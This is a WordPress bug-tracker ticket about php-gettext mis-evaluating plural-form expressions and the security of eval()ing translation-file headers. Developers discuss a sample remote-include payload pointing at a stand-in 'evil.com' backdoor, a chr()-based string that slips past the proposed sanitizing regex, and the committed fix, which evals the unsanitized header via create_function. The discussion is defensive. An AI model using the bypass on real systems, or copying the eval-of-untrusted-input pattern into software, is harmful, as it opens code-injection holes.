Make WordPress Core

Opened 18 years ago

Closed 18 years ago

#4005 closed defect (bug) (fixed)

php-gettext's plural forms parsing is broken for nplurals>2

Reported by: moeffju's profile moeffju Owned by: ryan's profile ryan
Milestone: 2.2 Priority: high
Severity: normal Version: 2.1.2
Component: I18N Keywords: has-patch i18n
Focuses: Cc:

Description

Complicated Plural-Forms expression get evaluated wrongly by php-gettext, so that languages with more than two plural forms (e.g. Lithuanian, Slovenian, etc.) don't get the correct plural form for ngettext calls.
Attached patch (also sent upstream) fixes the issue.

Attachments (4)

gettext-plural-forms.patch (1.0 KB) - added by moeffju 18 years ago.
Patch against php-gettext 1.0.7 to fix plural forms parsing
gettext.php.diff (1.1 KB) - added by Sewar 18 years ago.
Modified patch for trunk (2.2)
gettext.php.2.diff (1.6 KB) - added by moeffju 18 years ago.
Fix plural forms handling, revision 2 (better input sanitizing)
gettext-plurals.diff (22.2 KB) - added by nbachiyski 18 years ago.
moeffju's fixes + select_string enhancements + indent + none whitespace at the end of lines

Download all attachments as: .zip

Change History (25)

@moeffju
18 years ago

Patch against php-gettext 1.0.7 to fix plural forms parsing

#1 @moeffju
18 years ago

Oh, I just realized this patch is against the original php-gettext source, but it should be easy enough to apply to your codebase.

@Sewar
18 years ago

Modified patch for trunk (2.2)

#2 @Sewar
18 years ago

  • Keywords has-patch commit added
  • Milestone changed from 2.3 to 2.1.3
  • Priority changed from low to high
  • Version set to 2.1.2

I have faced this bug during translate WP to Arabic, but i think it is bug in plural-forms expression i used.

After applying this patch, it worked like a charm.

#3 @Sewar
18 years ago

Forged to say thank you moeffju

#4 @foolswisdom
18 years ago

  • Milestone changed from 2.1.3 to 2.2

#5 @ryan
18 years ago

  • Owner changed from anonymous to ryan

#6 @nbachiyski
18 years ago

Ryan, if you commit this, you could also remove the semicolon append code. A semicolon is always added in this one.

And just a note about the patch. Is the regex check really needed? What do we win if we sanitize it?

#7 @ryan
18 years ago

I'm curious about the regex too. Do we really need to sanitize against a whitelist?

#8 @moeffju
18 years ago

I wrote that chunk of code for Habari, and just ported it over to php-gettext/wordpress. Sanitizing the plural-forms header seems reasonable since it will be eval()'d with only minor changes, and it is user-supplied data; in theory you could put something there like include('http://evil.com/backdoor.php'). Since the file format is binary and WP translations are usually supplied by third parties, the input should be treated as user input and sanitized thusly.

Re nbachiyski, good catch, although multiple semicolons should not matter.

#9 @moeffju
18 years ago

For some additional explanation: PHP evaluates ternary operator expressions from left to right. Thus, for Plural-Forms like nplurals=3; plural=n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;:

for n = 1: (expected: 0, actual: 2)

   1%10==1 && 1%100!=11 ? 0 : 1%10>=2 && 1%10<=4 && (1%100<10 || 1%100>=20) ? 1 : 2
=> TRUE && TRUE ? 0 : FALSE && TRUE && (TRUE || FALSE) ? 1 : 2
=> (TRUE && TRUE ? 0 : FALSE && TRUE && (TRUE || FALSE)) ? 1 : 2
=> 0 ? 1 : 2
=> 2

Parenthesizing the subexpressions fixes the precedence.

#10 @nbachiyski
18 years ago

It was hard, but being stubborn sometimes helps. Here is a string of code, which passes through your filter and includes an arbitrary file (I didn't have the nerve and just try to include d in the sample):

ob_start();
print(chr(105));
print(chr(110));
print(chr(99));
print(chr(108));
print(chr(117));
print(chr(100));
print(chr(101));
print(chr(32));
print(chr(34));
print(chr(100));
print(chr(34));
print(chr(59));
eval(ob_get_flush());

It was not easy without neither quotes nor comas :)

Anyway, I suggest that we just write some simple parser for php's ternary expressions. There are some nice unit tests on the topic.

#11 @moeffju
18 years ago

While your string passes the sanitizing regex, the code is never actually run since in the next step (in select_string()), all 'n's are replaced with the value of $n, which breaks the priNt. echo would probably work. Changing the regex to:

	$expr= preg_replace(
		'@[^plurasno0-9:;\(\)\?\|\&=!<>+*/\%-]@',
		'',
		$expr
	);

ought to fix that, too. (The additional 'o' in the char range is for malformed files using 'or' instead of '||'; I also removed the underscore.)

Alternatively, you could sanitize the plurals= part separately and strip semicolons and all chars but 'n' on the RHS of the assignment:

if (preg_match('/^\s*nplurals\s*=\s*(\d+)\s*;\s*plural=(.*)$/', $expr, $matches)) {
	$nplurals= preg_replace( '@[^0-9]@', '', $matches[1] );
	$plural= preg_replace( '@[^n0-9:\(\)\?\|\&=!<>+*/\%-]@', '', $matches[2] );
	$expr= 'nplurals='.$nplurals.';plural='.$plural;
}
else {
//malformed expression, use default
}

I'll submit a new patch using the second alternative.

@moeffju
18 years ago

Fix plural forms handling, revision 2 (better input sanitizing)

#12 @moeffju
18 years ago

New patch applies cleanly to trunk.

#13 @nbachiyski
18 years ago

I am not sure if it is worth it to sanitize the string. There is great chance that every filtering can be compromised and cheated. Also, if somebody wants to distribute harmful code, there are surely easier ways to to it.

A side note - I think we could speed up select_string a lot. We could just the first time compile the code using create_function and then just call it to get the plural index. Something like (I haven't prepared the real patch yet):

$s = str_replace('n', '$n', $string);
$this->choose_plural_string = create_function('$n', 'return '.$s);

After that on every call of select_string we just return $this->choose_plural_string($n).
My trivial tests show that this approach is between 5 and 10 times faster. Unfortunately there aren't many plural strings, so it won't be noticeable :-)

#14 @moeffju
18 years ago

That's what I'm doing for Habari, but I didn't want to replace the complete php-gettext plural code with Habari's ;)

#15 @moeffju
18 years ago

Check http://trac.habariproject.org/habari/changeset?new=trunk%2Fhtdocs%2Fsystem%2Fclasses%2Flocale.php%40617&old=trunk%2Fhtdocs%2Fsystem%2Fclasses%2Flocale.php%40508 for Habari's implementation, if you want to port that. Since the php-gettext developers don't seem to care, I might split that code out to Yet Another PHP Gettext Project soon.

#16 @nbachiyski
18 years ago

Yeap, it looks nice. Would you be so kind to make a patch for WP also :-)

#17 @foolswisdom
18 years ago

  • Keywords needs-patch added; has-patch commit removed
  • Milestone changed from 2.2 to 2.3

#18 @Sewar
18 years ago

  • Keywords has-patch added; needs-patch removed
  • Milestone changed from 2.3 to 2.2

foolswisdom: This is very important for most non-English users, and there's patches working well.

#19 @ryan
18 years ago

If we can get an updated patch that nbachiyski approves, I will gladly commit.

@nbachiyski
18 years ago

moeffju's fixes + select_string enhancements + indent + none whitespace at the end of lines

#20 @nbachiyski
18 years ago

  • Keywords i18n added

I had some free time this morning, so here is a patch. Unfortunately one can't see my changes very clearly because I couldn't stand the indentation and fixed it before coding. Here is a summary of the changes:

  • Inside are Matthias' parenthesis fixes without the sanitizing (in get_plural_forms)
  • The select_string is cached in a dynamically created callback (in select_string)

Anyone who sees it, please test, so we can safely put this in 2.2.

Sewar, thanks for moving the milestone. We could have easily forgotten this...

#21 @rob1n
18 years ago

  • Resolution set to fixed
  • Status changed from new to closed

(In [5266]) Fix gettext's plural forms for more than 2 plural forms. Props moeffju and nbachiyski. fixes #4005

Note: See TracTickets for help on using tickets.